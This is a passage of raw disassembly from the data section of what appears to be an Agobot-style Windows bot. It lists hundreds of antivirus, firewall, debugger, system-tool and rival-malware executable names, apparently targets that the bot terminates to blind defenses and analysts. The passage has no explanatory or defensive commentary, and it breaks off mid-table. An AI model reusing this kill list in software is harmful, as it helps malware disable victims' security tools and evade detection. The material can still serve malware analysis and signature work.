dword_438C1C dd 6E757269h, 78652E34h, 65hdword_438C28 dd 75643364h, 74616470h, 78652E65h, 65hdword_438C38 dd 65746172h, 6578652Eh, 0dword_438C44 dd 74617373h, 78652E65h, 65hdword_438C50 dd 736E6977h, 652E7379h, 6578hdword_438C5C dd 756E6977h, 652E6470h, 6578hdword_438C68 dd 4D737953h, 50586E6Fh, 6578652Eh, 0dword_438C78 dd 61656262h, 2E656C67h, 657865hdword_438C84 dd 696E6550h, 2E323373h, 657865hdword_438C90 dd 7663736Dh, 2E323362h, 657865hdword_438C9C dd 69737973h, 2E6F666Eh, 657865haPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: ___:00438BD8�o
align 4
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: ___:00438BD4�o
align 4
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: ___:00438BD0�o
align 4
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: ___:00438BCC�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: ___:00438BC8�o
align 4
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: ___:00438BC4�o
align 10h
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: ___:00438BC0�o
align 10h
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: ___:00438BBC�o
align 10h
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: ___:00438BB8�o
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: ___:00438BB4�o
align 10h
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: ___:00438BB0�o
align 4
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: ___:00438BAC�o
align 4
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: ___:00438BA8�o
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: ___:00438BA4�o
align 10h
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: ___:00438BA0�o
align 10h
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: ___:00438B9C�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: ___:00438B98�o
align 4
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: ___:00438B94�o
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: ___:00438B90�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: ___:00438B8C�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: ___:00438B88�o
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: ___:00438B84�o
align 4
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: ___:00438B80�o
align 4
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: ___:00438B7C�o
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: ___:00438B78�o
align 4
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: ___:00438B74�o
align 4
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: ___:00438B70�o
align 4
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: ___:00438B6C�o
align 4
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: ___:00438B68�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: ___:00438B64�o
align 10h
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: ___:00438B60�o
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: ___:00438B5C�o
align 4
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: ___:00438B58�o
align 4
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: ___:00438B54�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: ___:00438B50�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: ___:00438B4C�o
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: ___:00438B48�o
align 10h
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: ___:00438B44�o
align 10h
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: ___:00438B40�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: ___:00438B3C�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: ___:00438B38�o
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: ___:00438B34�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: ___:00438B30�o
align 4
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: ___:00438B2C�o
align 4
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: ___:00438B28�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: ___:00438B24�o
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: ___:00438B20�o
align 4
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: ___:00438B1C�o
align 10h
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: ___:00438B18�o
align 10h
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: ___:00438B14�o
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: ___:00438B10�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: ___:00438B0C�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: ___:00438B08�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: ___:00438B04�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: ___:00438B00�o
align 4
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: ___:00438AFC�o
align 10h
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: ___:00438AF8�o
align 4
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: ___:00438AF4�o
align 4
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: ___:00438AF0�o
align 4
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: ___:00438AEC�o
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: ___:00438AE8�o
align 4
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: ___:00438AE4�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: ___:00438AE0�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: ___:00438ADC�o
align 10h
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: ___:00438AD8�o
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: ___:00438AD4�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: ___:00438AD0�o
align 4
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: ___:00438ACC�o
align 4
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: ___:00438AC8�o
align 4
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: ___:00438AC4�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: ___:00438AC0�o
align 10h
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: ___:00438ABC�o
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: ___:00438AB8�o
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: ___:00438AB4�o
align 4
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: ___:00438AB0�o
align 10h
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: ___:00438AAC�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: ___:00438AA8�o
align 4
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: ___:00438AA4�o
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: ___:00438AA0�o
align 4
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: ___:00438A9C�o
align 10h
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: ___:00438A98�o
align 10h
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: ___:00438A94�o
align 4
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: ___:00438A90�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: ___:00438A88�o
; ___:00438A8C�o
align 4
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: ___:00438A84�o
align 10h
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: ___:00438A80�o
align 10h
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: ___:00438A7C�o
align 4
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: ___:00438A78�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: ___:00438A74�o
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: ___:00438A70�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: ___:00438A6C�o
align 4
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: ___:00438A68�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: ___:00438A64�o
align 10h
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: ___:00438A60�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: ___:00438A5C�o
align 4
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: ___:00438A58�o
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: ___:00438A54�o
align 4
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: ___:00438A50�o
align 10h
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: ___:00438A4C�o
align 4
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: ___:00438A48�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: ___:00438A44�o
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: ___:00438A40�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: ___:00438A3C�o
align 4
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: ___:00438A38�o
aTca_exe db 'TCA.EXE',0 ; DATA XREF: ___:00438A34�o
aTc_exe db 'TC.EXE',0 ; DATA XREF: ___:00438A30�o
align 4
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: ___:00438A2C�o
align 10h
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: ___:00438A28�o
align 4
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: ___:00438A24�o
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: ___:00438A20�o
align 4
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: ___:00438A1C�o
align 10h
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: ___:00438A18�o
align 4
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: ___:00438A14�o
align 4
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: ___:00438A10�o
align 4
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: ___:00438A0C�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: ___:00438A08�o
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: ___:00438A04�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: ___:00438A00�o
align 4
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: ___:004389FC�o
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: ___:004389F8�o
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: ___:004389F4�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: ___:004389F0�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: ___:004389EC�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: ___:004389E8�o
align 4
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: ___:004389E4�o
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: ___:004389E0�o
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: ___:004389DC�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: ___:004389D8�o
align 4
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: ___:004389D4�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: ___:004389D0�o
align 10h
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: ___:004389CC�o
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: ___:004389C8�o
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: ___:004389C4�o
align 4
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: ___:004389C0�o
align 10h
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: ___:004389BC�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: ___:004389B8�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: ___:004389B4�o
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: ___:004389B0�o
align 4
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: ___:004389AC�o
align 10h
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: ___:004389A8�o
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: ___:004389A4�o
align 4
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: ___:004389A0�o
align 10h
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: ___:0043899C�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: ___:00438998�o
align 4
aSms_exe db 'SMS.EXE',0 ; DATA XREF: ___:00438994�o
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: ___:00438990�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: ___:0043898C�o
align 4
aShn_exe db 'SHN.EXE',0 ; DATA XREF: ___:00438988�o
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: ___:00438984�o
aSh_exe db 'SH.EXE',0 ; DATA XREF: ___:00438980�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: ___:0043897C�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: ___:00438978�o
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: ___:00438974�o
align 10h
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: ___:00438970�o
align 4
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: ___:0043896C�o
align 4
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: ___:00438968�o
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: ___:00438964�o
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: ___:00438960�o
align 4
aSd_exe db 'SD.EXE',0 ; DATA XREF: ___:0043895C�o
align 10h
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: ___:00438958�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: ___:00438954�o
align 4
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: ___:00438950�o
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: ___:0043894C�o
align 10h
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: ___:00438948�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: ___:00438944�o
align 4
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: ___:00438940�o
align 4
aSc_exe db 'SC.EXE',0 ; DATA XREF: ___:0043893C�o
align 4
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: ___:00438938�o
align 4
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: ___:00438934�o
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: ___:00438930�o
align 10h
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: ___:0043892C�o
align 10h
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: ___:00438928�o
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: ___:00438924�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: ___:00438920�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: ___:0043891C�o
align 4
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: ___:00438918�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: ___:00438914�o
align 4
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: ___:00438910�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: ___:0043890C�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: ___:00438908�o
align 10h
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: ___:00438904�o
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: ___:00438900�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: ___:004388FC�o
align 4
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: ___:004388F8�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: ___:004388F4�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: ___:004388F0�o
align 10h
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: ___:004388EC�o
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: ___:004388E8�o
align 4
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: ___:004388E4�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: ___:004388E0�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: ___:004388DC�o
align 10h
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: ___:004388D8�o
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: ___:004388D4�o
align 4
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: ___:004388D0�o
align 4
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: ___:004388CC�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: ___:004388C8�o
align 10h
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: ___:004388C4�o
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: ___:004388C0�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: ___:004388BC�o
align 4
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: ___:004388B8�o
align 10h
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: ___:004388B4�o
align 10h
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: ___:004388B0�o
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: ___:004388AC�o
align 10h
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: ___:004388A8�o
align 4
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: ___:004388A4�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: ___:004388A0�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: ___:0043889C�o
align 4
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: ___:00438898�o
align 4
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: ___:00438894�o
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: ___:00438890�o
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: ___:0043888C�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: ___:00438888�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: ___:00438884�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: ___:00438880�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: ___:0043887C�o
align 10h
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: ___:00438878�o
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: ___:00438874�o
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: ___:00438870�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: ___:0043886C�o
align 4
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: ___:00438868�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: ___:00438864�o
align 4
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: ___:00438860�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: ___:0043885C�o
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: ___:00438858�o
align 4
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: ___:00438854�o
align 4
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: ___:00438850�o
align 4
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: ___:0043884C�o
align 10h
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: ___:00438848�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: ___:00438844�o
align 4
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: ___:00438840�o
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: ___:0043883C�o
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: ___:00438838�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: ___:00438834�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: ___:00438830�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: ___:0043882C�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: ___:00438828�o
align 4
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: ___:00438824�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: ___:00438820�o
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: ___:0043881C�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: ___:00438818�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: ___:00438814�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: ___:00438810�o
align 4
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: ___:0043880C�o
align 10h
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: ___:00438808�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: ___:00438804�o
align 4
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: ___:00438800�o
align 10h
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: ___:004387FC�o
align 4
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: ___:004387F4�o
; ___:004387F8�o
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: ___:004387F0�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: ___:004387EC�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: ___:004387E8�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: ___:004387E4�o
align 4
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: ___:004387E0�o
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: ___:004387DC�o
align 4
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: ___:004387D8�o
align 4
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: ___:004387D4�o
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: ___:004387D0�o
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: ___:004387CC�o
align 4
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: ___:004387C8�o
align 4
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: ___:004387C0�o
; ___:004387C4�o
align 4
aNui_exe db 'NUI.EXE',0 ; DATA XREF: ___:004387BC�o
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: ___:004387B8�o
align 10h
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: ___:004387B4�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: ___:004387B0�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: ___:004387AC�o
align 4
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: ___:004387A8�o
align 4
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: ___:004387A4�o
align 4
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: ___:004387A0�o
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: ___:0043879C�o
align 10h
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: ___:00438798�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: ___:00438794�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: ___:00438790�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: ___:0043878C�o
align 10h
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: ___:00438788�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: ___:00438784�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: ___:00438780�o
align 10h
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: ___:0043877C�o
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: ___:00438778�o
align 4
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: ___:00438774�o
align 4
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: ___:00438770�o
align 10h
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: ___:0043876C�o
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: ___:00438768�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: ___:00438764�o
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: ___:00438760�o
align 10h
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: ___:0043875C�o
align 10h
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: ___:00438758�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: ___:00438754�o
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: ___:00438750�o
align 4
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: ___:0043874C�o
align 4
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: ___:00438748�o
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: ___:00438744�o
align 4
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: ___:00438740�o
align 10h
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: ___:0043873C�o
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: ___:00438738�o
align 4
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: ___:00438734�o
align 4
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: ___:00438730�o
align 10h
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: ___:0043872C�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: ___:00438728�o
align 4
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: ___:00438724�o
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: ___:00438720�o
align 10h
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: ___:0043871C�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: ___:00438718�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: ___:00438714�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: ___:00438710�o
align 10h
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: ___:0043870C�o
align 4
aNav_exe db 'NAV.EXE',0 ; DATA XREF: ___:00438708�o
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: ___:00438704�o
align 4
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: ___:00438700�o
align 10h
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: ___:004386FC�o
align 10h
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: ___:004386F8�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: ___:004386F4�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: ___:004386F0�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: ___:004386EC�o
align 4
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: ___:004386E8�o
align 4
